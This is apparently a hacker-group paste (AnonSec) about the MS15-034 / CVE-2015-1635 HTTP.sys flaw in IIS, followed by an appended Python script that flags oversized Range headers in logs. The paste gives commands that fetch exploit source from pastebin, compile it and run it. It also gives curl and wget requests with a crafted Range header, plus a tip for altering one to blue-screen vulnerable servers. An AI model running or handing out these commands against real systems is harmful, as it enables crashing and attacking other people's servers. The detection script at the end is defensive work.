We are... AnonSec
//Laughing at your security since 2012*
=================================================================================================
Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - MS08-067 - Hannaichi - ap3x h4x0r - Gh05tFr3ak - OverKiller - Cyb3r Shzz0r - Pr3d4T0r - Mr. BlackList - AN0NT0XIC - Ny0g3n
=================================================================================================

(CVE-2015-1635)

Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2 systems running Microsoft's IIS web server are affected. The component at fault is HTTP.sys, a kernel-level driver that forwards requests for webpages and the like to the user-space server software, and caches static files.

Microsoft Windows - HTTP.sys PoC (MS15-034)
http://www.exploit-db.com/exploits/36773/

wget http://pastebin.com/raw.php?i=ypURDPc4 -O HTTPsys.c
gcc HTTPsys.c -o HTTPsys
./HTTPsys

To check if vuln/exploit using curl:

curl -v [ipaddress]/static.png -H "Host: test" -H "Range: bytes=0-18446744073709551615"

Change 0- to 20- to blue-screen-of-death a vulnerable box.

With Wget:

wget -O /dev/null --header="Range: bytes=0-18446744073709551615" http://[ip address]/

[+] Sources [+]
https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
https://support.microsoft.com/en-us/kb/3042553
http://www.theregister.co.uk/2015/04/16/http_sys_exploit_wild_ms15_034/
http://www.exploit-db.com/exploits/36773/

Twitter: @rhcp011235
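
A detection-side view of the Range check above, as an added example that is not part of the original paste: it flags logged requests whose Range header carries a byte offset at or near the 64-bit maximum used in the curl command. The log format, the 2**63 threshold and the sample lines are assumptions constructed for illustration.

```python
import re

U64_MAX = 2**64 - 1      # 18446744073709551615, the end offset in the check above
SUSPICIOUS_END = 2**63   # assumption: no real file offset ever gets this large

# Hypothetical proxy log format (constructed for this example):
#   <client> "<method> <path>" range="<Range header value>"
LOG_LINE = re.compile(r'^(\S+) "(\S+) (\S+)" range="([^"]*)"$')
BYTE_SPEC = re.compile(r"^(\d*)-(\d*)$")

def classify_range(value):
    """Return 'none', 'ok', 'malformed' or 'suspicious' for a Range header value."""
    if not value:
        return "none"
    unit, sep, specs = value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return "malformed"
    verdict = "ok"
    for spec in specs.split(","):          # a header may carry several ranges
        m = BYTE_SPEC.match(spec.strip())
        if not m or not any(m.groups()):   # "-" alone or non-numeric text
            if verdict == "ok":
                verdict = "malformed"
            continue
        # Python ints do not wrap, so offsets past 2**64 are compared safely.
        if any(int(g) >= SUSPICIOUS_END for g in m.groups() if g):
            verdict = "suspicious"
    return verdict

def scan(lines):
    """Return (client, path, range_value) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if m and classify_range(m.group(4)) == "suspicious":
            hits.append((m.group(1), m.group(3), m.group(4)))
    return hits

# Constructed sample lines; addresses come from the documentation ranges.
SAMPLE = [
    '192.0.2.10 "GET /static.png" range=""',
    '192.0.2.10 "GET /video.mp4" range="bytes=0-1023"',
    '198.51.100.7 "GET /static.png" range="bytes=0-18446744073709551615"',
    '198.51.100.7 "GET /" range="bytes=0-99,100-18446744073709551615"',
    '203.0.113.5 "GET /a.zip" range="bytes=-500"',
]

if __name__ == "__main__":
    for client, path, rng in scan(SAMPLE):
        print(f"suspicious Range from {client} for {path}: {rng}")
```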